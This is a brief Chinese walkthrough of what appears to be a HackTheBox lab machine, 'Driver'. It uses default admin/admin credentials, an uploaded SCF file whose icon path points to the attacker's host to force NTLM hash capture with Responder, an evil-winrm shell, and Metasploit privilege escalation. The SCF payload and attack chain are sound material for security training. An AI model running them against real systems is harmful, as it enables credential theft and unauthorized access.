Driver
nmap扫描,开放80、135、445
访问80,提示要求登录
使用弱口令admin/admin
成功登录,来到如下页面
在http://10.10.11.106/fw_up.php
页面能够上传
尝试上传了个php,上传成功,但是找不到上传之后的路径。
参考wp,利用了强制NTLM请求,模拟用户操作从而获得用户hash。方法可参考https://www.secpulse.com/archives/158433.html
创建一个scf文件
[Shell]
Command=2
IconFile=\\10.10.14.3\nc.ico
[Taskbar]
Command=ToggleDesktop
本地开启responder监听,然后将文件上传上去
随后收到了tony的NTLM请求内容
爆破,得到tony用户的密码
evil-winrm命令执行,拿到tony的shell
查看操作系统版本,systeminfo被禁了,找了powershell中查看的方法,得到操作系统版本是win10
[System.Environment]::OSVersion.Version
尝试了https://github.com/KaLendsi/CVE-2021-1732-Exploit没有成功,直接上msf
探测可用的提权
使用exploit/windows/local/ricoh_driver_privesc
进行攻击,曾经成功过,后来没有成功过。